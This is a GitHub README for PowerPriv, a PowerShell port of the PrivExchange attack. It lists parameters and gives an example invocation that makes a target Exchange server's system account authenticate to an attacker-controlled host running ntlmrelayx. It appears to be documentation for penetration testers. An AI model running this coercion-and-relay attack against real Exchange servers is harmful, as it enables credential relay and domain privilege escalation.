/PowerPriv

A Powershell implementation of PrivExchange designed to run under the current user's context

Primary LanguagePowerShellBSD 3-Clause "New" or "Revised" LicenseBSD-3-Clause

PowerPriv

DESCRIPTION

A powershell implementation of PrivExchange by @_dirkjan (original code found here: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Useful for environments on which you cannot run python-based applications, have user credentials, or do not want to drop files to disk. Will cause the target exchange server system account to attempt to authenticate to a system of your choice.

-targetHost

Hostname or IP of the target exchange box. Based on DNS config may require FQDN if using hostname. (Required)

-attackerHost

Hostname or IP of a system you control, and are ideally running ntlmrelayx on. We are telling the Exchange server to attempt to authenticate to this system. Based on DNS config may require FQDN if using hostname. (Required)

-exchangePort

Port to attempt to connect to Exchange server over. Default is 443.

-attackerPort

Port Exchange should attempt to connect back to the attacker over. Default is 80

-attackerPage

Page we are telling the Exchange server to connect to on our attack system. Slashes are not required. Default is powerPriv.

-noSSL

Set to true if you dont want to use https to connect initially to the Exchange server. Default is false (use https).

-Version

Version of Exchange server we're targeting. Default is 2013.

EXAMPLE

powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016

NOTES

Author: @g0ldenGunSec  - Based on the tool created by @_dirkjan
Only use this tool on networks you own or have permission to test against.